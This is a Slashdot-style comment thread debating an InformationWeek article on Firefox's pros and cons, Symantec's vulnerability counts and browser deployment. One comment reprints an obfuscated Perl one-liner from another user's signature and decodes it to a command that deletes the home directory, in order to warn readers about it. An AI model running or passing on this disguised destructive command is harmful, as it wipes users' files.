Pros and Cons of Firefox Critically Evaluated?

A Dafa Disciple writes "Fred Langa of Information Week has written an article claiming to discuss the 'Pros and Cons of Firefox'. At first I was excited because I thought I was going to get to finally read an enlightening, in-depth article that critically examined the browser. I should have known better. Aside from the usual criticism of open source software, it contains a reference to a Symantec Internet Security Report which claims that more security vulnerabilities in the last six months of 2004 were found in Firefox than IE. I'll leave it to you to analyze Mr. Langa's opinion and scrutinize Symantec's study and reputation as a security software developer."

Print Version of the Article

[Anonymous Coward]

Print version of the article [informationweek.com] fitting nicely onto one page.

In other news...Firefox 1.0.3 released

[nacks1]

Its a little odd that this article would be posted without a note that Firefox 1.0.3 has just been released: http://www.mozilla.org/products/firefox/releases/1 .0.3.html [mozilla.org]

Mod Parent Down-Malicious Perl Code in Sig

[JLavezzo]

Please mod the parent down. He has put un-labled malicious Perl code in his sig. Evidently as a prank or due to some sort of simple-mindedness.

Firefox eased my pain

[jimboisbored]

I used to run adaware with IE, I've run it once and a while since I switched to firefox and it'll occasionally find a cookie or two that doesn't bother me. With IE it'd find a couple hundred problems.
Security vulnerabilites my ass.
(yes I know spyware and security is different, but firefox sure is a lot less of a pain in the ass)

Re:The biggest downside to Firefox

[ikkonoishi]

They have that.

Its called mozilla.

Firefox is mozilla with most of the extra stuff besides the browser cut out.

Information week

[0kComputer]

There will always be reviews out there you don't like. First, this is information week, the WSJ for the pointy haired bosses, I would expect nothing less than a shitty review, actually, I'm glad he gave it a shitty review.

Second, the guy looks like a total Asshat [wikipedia.org]. Look at his picture for christs sakes Fred Langa [cmpnet.com]

Re:The biggest downside to Firefox

[Mick Ohrberg]

A couple of plugins you may want to consider is adblock and flashblock. The combination seems to work very well to prevent pesky popup problems.

Re:symantec

[dlZ]

My shop had a computer with a variant of Klez on it that an up to date copy of Norton's missed. Considering the age of Klez, any virus scanner should find it and prevent it without an issue. Norton was on the machine and running at time of infection, too.

Only time I saw it miss something that major completely, but it killed the little hope I had left for the product.

Re:symantec

[jim_v2000]

I used to work for Symantec's tech support (used to--now Mike in India handles it) and the official line that we gave customers when they get a virus that Norton didn't detect was "Wait for the new definition file...it comes out next Wednesday." And when Norton wouldn't get rid of a virus, the line was "Norton Antivirus is a detection tool, not a removal tool." Which is total BS. If you read their website, the advertising for Norton AntiVirus says "Removes Viruses". That always troubled me, and I'm actually glad to be working elsewhere now.

I personally run Grisoft's AVG for free, and Zone Alarm, and not only have I never had a virus/worm, they run a zillion times faster than Norton AntiVirus and Personal Firewall.

Symantec makes bloatware that doesn't work well. Avoid it like the plague.

Re:Cons of Mac Firefox

[As Seen On TV]

Boy, do you have that backwards.

The reason why everything looks the same on a Mac is that developers use the system frameworks to draw their on-screen controls. If a program has a control that looks wrong, as Firefox does, that's because the program actually is wrong. If it were using the correct frameworks to draw its controls, the controls would look right.

This is a case where the fact that it looks wrong is a sign that it really is wrong.

Now, as for Safari, it's not perfect. But then again, neither is Firefox. Our internal guys assure us that Safari is just as compatible as Firefox with well-formed Web pages, and degrades gracefully with badly-formed pages. And unlike Firefox, Safari is an actual Mac application, with support for Bonjour and Spotlight and (most importantly) the Keychain built right in.

Firefox isn't a Mac application. It's a third-party application that was ported badly to the Mac.

Re:symantec

[LnxAddct]

This [secunia.com] says it all [secunia.com]. Not only has Firefox had 1/7 the vulnerabilities of IE, but those that it did have were patched quicker and were of less severity in most cases.
Regards,
Steve

Re:If only it was as good as Mozilla.

[aweiland]

Prefix your search in the address bar with "google".

i.e. to search google for foo bar try: google foo bar

Firefox actually comes with a few more of these quick searches set up and it's easy to create your own (they are a special bookmark).

One page view - no ads

[mrklin]

Original = four pages. Save clicks

http://www.informationweek.com/shared/printableArt icle.jhtml?articleID=160900911 [slashdot.org]

US Cert

[flokemon]

In most cases in the more recent issues, you'll see the list of IE's vulnerabilities is shorter than those for Firefox, Mozilla, and the other alternate browsers. Likewise, with the more recent bulletins, you'll also see the list of Windows' vulnerabilities is actually much shorter than that for the other operating systems, even though Windows is far more widely installed.

Where did he get this from??
Latest 10 vulnerabilities on front page are all Windows.

If you look at the bulletins like he does, you get a collection of vulnerabilities that have been patched.

US-Cert Vulnerability Notes [cert.org] is where he should be searching if he wants a proper comparison.
Firefox returns 11 results.
I didn't count how many results Internet Explorer returned, but even if you don't count pre-2004 vulnerabilities, the number is still twice as high as it is for Firefox.

Symantec

[eno2001]

In a word... sucks. Where I work, there was a trojan/worm that we were tracking and Symantec Corporate Edition wasn't finding it. After talking to them, it turns out they already knew about the problem but weren't going to be releasing any definition updates for mass deployment for a week. Instead they sent us a link to the early updates that we could apply manually. This stuff should be automated! Total suck in my opinion. Of course, I'm not the Windows admin here thankfully. That's a job I don't think I'd really want.

Re:The biggest downside to Firefox

[Magycian]

Easy fix to this in win 2k and xp.

Install Firefox. Install all of your plugins, themes, decorations, bangles, tools.

Copy the Mozilla folder from your home folder application data. Application data is a hidden folder. a little digging will find it though.

On new machine install firefox.
Copy folder to the same place on new machine.

Presto. Nothing lost.

Can be used to create a custom look for your firefox across the network if you'd like. Force a backup of the folder for each user and their prefs all stay after a crash. Put the files on a USB key and carry your firefox with you. Thunderbird too.

Works for me.

Re:More exploits?

[suitepotato]

Microsoft doesn't practice security by obscurity, they don't practice security at all.

Microsoft is still deeply locked into a corporate LAN mindset where all hosts are trusted, no one does anything shifty, and all users are business users. Meanwhile, they rule the civilian end-user market and the civies aren't remotely trustworthy, have too much free time on their hands, etc. The Internet is not a twenty seat LAN in Bismarck.

On top of this, you have Microsoft's usual bad coding practices, lack of thorough testing inhouse, and this has gone on for years and only compounded itself over and over again. An entire operating system is designed and coded with development tools which are themselves far from bulletproof which were coded on the prior OS iteration which itself was far from bulletproof having been coded on the prior development tool which itself was...

It's like standing between two opposed mirrors, except they're funhouse mirrors and you're sitting there trying to grind them accurate with a handful of abrasive,a sponge, and bucket of water and your boss keeps tossing them out and replacing them with new ones that are only slightly closer to true. "Leave it to the buyer to find the distortions!"

They practice obfuscation, but it has nothing to do with security. They're practicing obscurity in development. Sort of like erasing pieces of your blueprints at random as you think you've built that section correctly.

No Yahoo Logo?

[chill]

I read the comment about Firefox not displaying the Yahoo logo and I couldn't believe it. Then, I popped over to Yahoo.com and sure enough, no logo.

A quick check of the source told me what was going on. I recognized the yimg URL as one that I had *BLOCKED* images from long ago. Yahoo serves tons of graphics ads all over the Internet and I just blocked them all using Firefox's native ability to block images from a particular URL.

It seems Yahoo serves their own graphics from the same server as their ads. Silly rabbit.

So, it isn't a rendering bug with Firefox, it is a feature! And a damned useful one at that.

feature + ignorance = bug? Sad.

-Charles

Re:The biggest downside to Firefox

[cloudmaster]

Firefox's "install" consists of one directory. Copied to many machines. The configuration consists of one file stored in a user's profile. The distribution of both is easily automated without requiring the use of an MSI.

Plugins, BTW, are also in that folder in the user's profile. You know, the one that's stored on a central server in your large network? Just set up firefox once on a test machine, and copy the firefox profile folder to each user's windows profile, then distribute the program files however you prefer to do that kind of thing.

This can't be the first program with a non-MSI install method that an admin of a large network has encountered...

Re:Mod Parent Down-Malicious Perl Code in Sig

[daniel de graaf]

$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see

Adding whitespace

($?) ? s:;s:s;;$?:
: s;;=]=>%-{<-|}<&|`{; ;
y; -/:-@[-`{-};`-{~" -; ;

s;;$_;see

$? is equal to zero normally, so that's the same as
s//=]=>%-{<-|}<&|`{/;
y/ -\/:-@[-`{-}/`-{~" -/;
s//$_/see

The first statement => $_ = '=]=>%-{<-|}<&|`{';
second translates $_ to 'system"rm -rf ~"'
third: eval $_

Safari has 0 vulnerabilities reported by Secunia

[cuijian]

Compare IE and Firefox security with Safari:
http://secunia.com/product/1543/ [secunia.com]

- Open source engine
- Less vulnerabilities discovered
- ZERO Unpatched Vulnerabilities

Why will more users = more insecurity?

[edmicman]

I've never understood the argument that the more people that user firefox (or linux for that matter), then hackers will begin to target those users, too. Isn't the point of OSS that ANYBODY can see the source code? If a vulnerability is found, why would anyone think it will stay there?!? It will be reviewed and fixed by any number of people in a timely manner. I think that's the core of what makes firefox and the like "more secure". What am I missing here?

Re:Cons of Mac Firefox

[Frank Palermo]

I might mention that Kevin Gerich's widget set [kmgerich.com] makes Firefox's HTML controls look much more presentable on Mac, in my opinion. It's not quite the same as having native Aqua widgets, but it's a start. Granted they aren't bundled with the application by default, nor do they solve any of the other OS integration issues you mentioned.

That having been said, I agree with the assessment that Firefox for Mac has a lot of catch-up to do to match Safari in terms of aesthetics. It's one of the biggest cons of choosing Firefox on the Mac platform. Safari, as Apple's own in-house effort, gets a level of fit-and-finish with the rest of the OS that third-party developers can have a tough time matching.

On the other hand, the biggest pro for Firefox on Mac (in my opinion) is the expandability. Safari doesn't have Adblock, BugMeNot, or any of my other favorite extensions. Even Camino doesn't support them. So in my case, I choose expandability over aesthetics and use Firefox as my default browser on Mac.

Ideally though, it would be possible to have both. Maybe in time and with further Firefox development.

-Frank

Re:It's quite possible there are more bugs in Fire

[gosand]

So, I wouldn't be surprised if more new security problems were located in Firefox in the recent past than in IE during the same time period. That doesn't imply that there are fewer problems in IE than in Firefox, just that fewer were found in a given time period.

Exactly. Not that vulnerabily counts aren't important, but you have to dig for more information. The article said there were 13 reported for IE and 21 for Firefox in the same time period. OK. How many of those have been fixed in IE and in Firefox? What was the breakdown on severity? What platforms were affected?

If the author didn't want to go into all this detail to give a more accurate picture, he shouldn't have just thrown out those numbers. I won't go as far as to say they are meaningless, but they don't paint an accurate picture.

Re:The biggest downside to Firefox

[Professional Slacker]

This is a great idea, it's what I use, but you missed a detail. As of Firefox 1.0 all the paths to extensions, themes, etc. that are recorded in the chrome.rdf file are all full paths (c:\docs & settings\$user_name\app_data\firefox\profile\$prof ilename\????.slt\$filename). This is all well and good if the user name is the same on both machines, but if the user names are different the paths won't be correct, no go. BUT with a little bit of mucking around in your profile's chrome.rdf you can set everything up to be relative to you're profile. To get relative paths working, open up chrome.rdf in your text editor of choice and replace instances of "c:\docs & settings\$user_name\app_data\firefox\profile\$prof ilename\????.slt\$filename" with "chrome://$filename". And now you've got a firefox profile that will run anywhere.

corrected link

[Anonymous Coward]

You suck at teh internet.

Here's the same link again, except that it's pointing to the correct place...

http://www.informationweek.com/shared/printableArt icle.jhtml?articleID=160900911 [informationweek.com]

formhistory.dat

[krygny]

formhistory.dat is encrypted.

Ah, the old "security" == "marketshare" claim.

[khasim]

Maybe Firefox is a more stable, more secure browser than IE, but everything is gonna have its flaws.

That depends upon how you define "flaws".

And the more people use it, the more it's gonna get targeted.

"Targeted" doesn't really matter.

My Linux box is frequently targetted, but it's all Windows exploits so it doesn't matter.

It's nice to give Microsoft the shaft, sure, but the more Firefox creeps into the mainstream, the more it's gonna inherently open itself up to exploits.

Ah, so there is no such thing as "security" then.

Just "marketshare".

No matter how many software experts put in how much effort, the end result will spontaniously generate "flaws" as more people use it.

By that "logic", there is no difference between a browser ("A") written by a team of experts who focused on security ... and a browser ("B") written by a 1st year student who cared nothing about security.

Flaws do NOT appear just because more people use the software.

Code is not magic.

Not quite

[Anonymous Coward]

"security by obscurity provides a fairly good amount of security assuming you can keep your code secure"

That's not quite right. It assumes that you can keep it secure (as you say), and it assumes that the workings of the program will not be suceptable to black-box reverse engineering.

IE appears to have hidden the code pretty well. But it has proven very suceptable to reverse engineering.

Re:No Yahoo Logo?

[dantheman82]

I had the same thing - no Yahoo images. This after I went to Ebay's page and also have no Ebay graphics. Both sites unfortunately use Ying (Yahoo) or Doubleclick and other services (Ebay) to display their graphics.

Yeah, my Adblock is really tight and unforgiving, so I really don't care about a missing picture here or there.

Which is what I find so great about Google...their ads are (a) not offensive since they are not text-based and (b) useful because they text-based and relevant.

US-CERT agrees with Symantec

[I'm Don Giovanni]

I see many here attacking Symantec, but if you read the article, US-CERT is also cited as a source questioning the "Firefix is more secure" mantra.

"US-CERT (United States Computer Emergency Readiness Team), a partnership between the Department of Homeland Security and the public and private sectors, impartially tracks all manner of security issues in operating systems and major applications, such as browsers. US-CERT issues a bulletin every week, outlining the current crop of problem areas. You can access all past and current bulletins

here [us-cert.gov]; I urge you to take a moment, click on over to their site, open several bulletins at random, and scroll down the page. In most cases in the more recent issues, you'll see the list of IE's vulnerabilities is shorter than those for Firefox, Mozilla, and the other alternate browsers. Likewise, with the more recent bulletins, you'll also see the list of Windows' vulnerabilities is actually much shorter than that for the other operating systems, even though Windows is far more widely installed."

So, making yourselves feel better by attacking the messenger Symantec is foolhardy because there are other messengers that agree with them.

Re:The biggest downside to Firefox

[cloudmaster]

If only there was a directory on Windows machines of the form

C:\Documents and Settings\All Users\Desktop :)

Re:The biggest downside to Firefox

[neithian]

I assume ListZilla [roachfiend.com] does the same thing? Perhaps better?

Re:The biggest downside to Firefox

[Anonymous Coward]

Could you please give me a link to the IE 6 .msi package Microsoft has produced?

Guess what, there isn't one. If you contact MS support, they can send you an very crappy MSI wrapper for the IE 6 setup executable. Other than that, you can make your own or find one somebody who has repackaged it. If you do a quick search, you can find Firefox .msi packages pretty quickly.

I found deploying Firefox to a couple thousand machines as easy as deploying IE 6 to the same number of Windows 2000 machines. The IEAK didn't do anything I needed that I couldn't do with FireFox by tweaking few plain text files.

IE does have configuration setting available through group policy, but you can add custom adm files. See:
http://sourceforge.net/projects/firefoxadm

I was working on my own adm templates so I haven't tried these yet, but if you take a look, there are probably more out there.

Re:The biggest downside to Firefox

[dolphinling]

The problem lies in that not all users know anything beyond point and click. For these users, getting to a site that says "You will need the flash plug in to view this site correctly" is a deal breaker.

Installing Flash is point-and-click. Yes, I just tried it. I'm even on Linux, and it's still point and click.

Even more so when all they see is just some inocous little image that doesnt explain to them why it isn't working. (Ala the little jigsaw piece)

It's a little puzzle piece that says "Click here to download plugin". After that, everything's automated. You just have to click next a few times and agree to a (Macromedia) license. You don't even have to restart the browser.

If you have any suggestions on how it could be improved, please report them to bugzilla.mozilla.org, or even just post here in reply to me or email me, and I'll do it for you (assuming I agree they'd improve it).

I wholeheartedly agree that firefox needs to have two rollouts. One with and without extensions.

This introduces huge licensing problems. If mozilla.org were to bundle Flash, for example, they would first have to get Macromedia's approval, and even then it would cause other problems, e.g. including it in Debian, which would most likely reject it because of the non-free license.

It also puts a lot more stress on the developers and release-candidate testers, as they have to do double the work.

I currently sit on a standards committee for the school district I work in and we shot down firefox, even though many of the admins use it on thier machines themselves

That's very unfortunate :-(

No Active X support (many of our online applications use active X)

You should fix your applications. You'll need to eventually, anyway, Firefox is just a good incentive to.

Most people consider the lack of ActiveX a good thing, as it strengthens security considerably.

Not as user friendly as other browsers (ease of use and clarity issues).

Most people would take the opposite position here: Firefox has a much better user interface than other browsers and especially Internet Explorer. If you have any specific issues, again, either report them to bugzilla.mozilla.org or send them to me and I'll pass them along to there.

Lack of a real centralized support center (The forums are a rich resource..if you have time to run searches or wait for someone to answer your post, which in a real world environment, is not conducive)

Though most people I've talked to think the support you can get in those forums is better and faster than what you get from most corporate support centers, I can understand why you might need this in a school or company. I believe there are one or perhaps even several third-party companies starting up to provide equivelant support, but I can't be certain off the top of my head. If this is a strong issue, you may want to look into it.

Potential for abuse by students of all age ranges (The tabbed browsing is an exceptional idea! however, most teachers are too sued to window browsing and wouldn't even notice the extra three or four tabs that are in the background hiding god knows what kind of sites from her view.)

This I know is a real issue, because I've used it myself in school ;-) I'd point out, though, that there are plenty of other ways that students can hide what they're doing, and I've watched friends play games for hours without the teacher knowing it, even in Internet Explorer.

Everytime we tried to see if there were possible solutions, we were either met with hostility on the forums for daring to suggest that firefox was lacking in any area or we got silence.

That's unfortunate. I'm sorry the people that found you weren't as helpful.

Re:The biggest downside to Firefox

[dolphinling]

This hasn't been true since before 1.0. Now there's a bar at the top of the screen, similar to the one for popups. Much less intrusive.